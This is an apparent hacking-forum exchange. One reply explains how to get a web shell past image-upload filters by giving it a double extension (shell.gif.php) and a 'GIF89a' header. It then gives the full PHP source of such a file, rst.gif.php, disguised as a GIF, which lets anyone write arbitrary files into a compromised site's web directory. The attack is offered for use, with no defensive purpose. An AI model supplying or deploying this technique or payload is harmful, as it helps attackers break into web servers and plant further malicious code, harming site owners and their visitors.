Sorry but I don't understand... What's your mothertongue? Maybe you should use Babelfish translator ?
u should rename yr web-shell with doubble extension like shell.gif.php and addd "GIF89a" then upload it to server .
file name rst.gif.php source! PHP: GIF<?php if(isset($_POST['upl_files'])){ echo 'button clicked'; //print_r($_FILES['file_n']); echo '<hr>'; $up_mas = $_FILES['file_n']; $mas_name = array(); $mas_tmp = array(); for($i=0; $i<10; $i++){ if(!empty($up_mas['name'][$i])){ $j = count($mas_name); $mas_name[$j] = $up_mas['name'][$i]; $mas_tmp[$j] = $up_mas['tmp_name'][$i]; } } for($i=0; $i<count($mas_name); $i++){ $upl_file = './'.$mas_name[$i]; if(move_uploaded_file($mas_tmp[$i], $upl_file)){ echo '<a href="'.$mas_name[$i].'">'.$mas_name[$i].'</a><br>'; } } } ?> <form enctype="multipart/form-data" method="post" action=""> <div style="padding: 10px; border: 1px solid #cccccc; width: 300px;"> <?php for($i=0; $i<10; $i++){ echo '<p><input type="file" name="file_n[]"></p>'; } ?> </div> <div style="padding: 10px; border: 1px solid #cccccc; margin-top: 10px; width: 300px;"> <input type="submit" name="upl_files" value="upload"> </div> </form> CoolA!